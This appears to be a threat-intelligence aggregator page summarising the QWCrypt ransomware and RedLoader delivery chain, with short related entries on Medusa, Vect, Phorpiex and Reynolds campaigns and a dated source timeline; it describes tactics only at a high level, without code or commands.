QWCrypt and RedLoader multi-stage ransomware activity
Malware Activity
Summary
Hide ▲
Show ▼
The QWCrypt ransomware chain now matters because it has reached successful deployment in at least three attacks, using RedLoader and a customized Terminator tool to stage payloads, discover hosts, and disable defenses. The activity relies on spear-phishing resumes and a multi-stage Windows delivery chain that shifted payload formats in April 2025 and again in July 2025. RedLoader reports infected hosts to C2 infrastructure and runs PowerShell for Active Directory discovery, while the final scripts delete shadow copies and console history to hinder recovery. The result is a tailored ransomware workflow that can spread across endpoint devices and hypervisors in victim environments.
Related Happenings
Medusa ransomware post-compromise deployment
Malware Activity
First: 07.04.2026 09:35
Last: 07.04.2026 09:35
Sources 1
About this happening:
**Medusa ransomware** is being deployed rapidly after initial access, turning intrusions into fast-moving extortion events and shrinking defenders' response time. The malware acti...
Medusa ransomware post-compromise deployment
Malware ActivityAbout this happening: **Medusa ransomware** is being deployed rapidly after initial access, turning intrusions into fast-moving extortion events and shrinking defenders' response time. The malware acti...
TeamPCP and Vect partner to turn supply-chain compromises into ransomware follow-on campaigns
Threat Actor Meta
First: 31.03.2026 15:15
Last: 31.03.2026 15:15
Sources 1
About this happening:
TeamPCP and **Vect ransomware group** are linking **supply-chain compromises** to **follow-on ransomware campaigns**, broadening extortion risk for affected organizations. The shi...
TeamPCP and Vect partner to turn supply-chain compromises into ransomware follow-on campaigns
Threat Actor MetaAbout this happening: TeamPCP and **Vect ransomware group** are linking **supply-chain compromises** to **follow-on ransomware campaigns**, broadening extortion risk for affected organizations. The shi...
2025 Ransomware trend toward built-in Windows tooling and lower ransom payment rates
Target Trend
First: 17.03.2026 23:41
Last: 17.03.2026 23:41
Sources 1
About this happening:
**Ransomware operators** are increasingly leaning on **built-in Windows tooling** while **ransom payment rates** continue to decline across **2025**, weakening extortion returns f...
2025 Ransomware trend toward built-in Windows tooling and lower ransom payment rates
Target TrendAbout this happening: **Ransomware operators** are increasingly leaning on **built-in Windows tooling** while **ransom payment rates** continue to decline across **2025**, weakening extortion returns f...
Phorpiex "Your Document" phishing campaign
Campaign
First: 10.02.2026 18:00
Last: 10.02.2026 18:00
Sources 1
About this happening:
**Phorpiex** is driving a **high-volume phishing campaign** that uses the lure **"Your Document"** and weaponised **.lnk** attachments to start a multi-stage infection chain. The...
Phorpiex "Your Document" phishing campaign
CampaignAbout this happening: **Phorpiex** is driving a **high-volume phishing campaign** that uses the lure **"Your Document"** and weaponised **.lnk** attachments to start a multi-stage infection chain. The...
Reynolds side-loaded-loader and GotoHTTP ransomware campaign
Campaign
First: 10.02.2026 16:36
Last: 10.02.2026 16:36
Sources 1
About this happening:
The **Reynolds** ransomware operation now shows **pre-deployment staging** and **post-deployment access tooling**, increasing the likelihood of persistent compromise on the target...
Reynolds side-loaded-loader and GotoHTTP ransomware campaign
CampaignAbout this happening: The **Reynolds** ransomware operation now shows **pre-deployment staging** and **post-deployment access tooling**, increasing the likelihood of persistent compromise on the target...
Timeline
-
09.12.2025 11:35 2 articles · 5mo ago
QWCrypt and RedLoader multi-stage ransomware activity
Initial DisclosureThe activity begins with **spear-phishing resumes** delivered through job-application workflows and booby-trapped links. Initial payload stages then use **WebDAV**, **rundll32.exe**, and **Adobe** sideloading to establish **RedLoader**.
Show sources
- STAC6565 Targets Canada in 80% of Attacks as Gold Blade Deploys QWCrypt Ransomware — thehackernews.com — 09.12.2025 11:35
- STAC6565 Targets Canada in 80% of Attacks as Gold Blade Deploys QWCrypt Ransomware — thehackernews.com — 09.12.2025 11:35